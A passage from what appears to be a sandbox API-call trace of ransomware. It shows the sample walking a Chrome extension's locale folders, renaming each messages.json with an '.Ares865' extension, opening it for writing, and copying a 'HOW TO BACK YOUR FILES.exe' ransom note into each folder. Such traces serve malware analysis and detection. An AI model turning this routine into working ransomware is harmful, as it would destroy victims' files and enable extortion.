ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.199] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.199] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.199] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.199] lstrlenW (lpString="messages.json") returned 13 [0101.199] lstrlenW (lpString="Ares865") returned 7 [0101.199] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.200] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.Ares865") returned 164 [0101.200] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=650) returned 1 [0101.206] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th" [0101.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th" [0101.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.207] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.207] GetLastError () returned 0x0 [0101.207] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8284db90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.208] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.208] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.208] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.208] lstrlenW (lpString="messages.json") returned 13 [0101.208] lstrlenW (lpString="Ares865") returned 7 [0101.208] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.208] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.Ares865") returned 164 [0101.208] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.210] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1099) returned 1 [0101.213] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv" [0101.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv" [0101.214] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.214] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.214] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.215] GetLastError () returned 0x0 [0101.215] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8282b8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.215] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.215] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.215] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.215] lstrlenW (lpString="messages.json") returned 13 [0101.215] lstrlenW (lpString="Ares865") returned 7 [0101.215] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.215] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.Ares865") returned 164 [0101.216] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.217] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=649) returned 1 [0101.220] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr" [0101.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr" [0101.220] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.220] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.221] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.221] GetLastError () returned 0x0 [0101.221] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828095d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.222] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.222] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.222] lstrlenW (lpString="messages.json") returned 13 [0101.222] lstrlenW (lpString="Ares865") returned 7 [0101.222] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.222] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.Ares865") returned 164 [0101.222] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=812) returned 1 [0101.235] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl" [0101.235] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl" [0101.235] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.235] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.236] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.236] GetLastError () returned 0x0 [0101.236] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827f5d50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.236] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.236] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.236] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.236] lstrlenW (lpString="messages.json") returned 13 [0101.236] lstrlenW (lpString="Ares865") returned 7 [0101.236] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.Ares865") returned 164 [0101.237] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=642) returned 1 [0101.241] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk" [0101.241] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk" [0101.241] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.241] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.242] CreateFileW 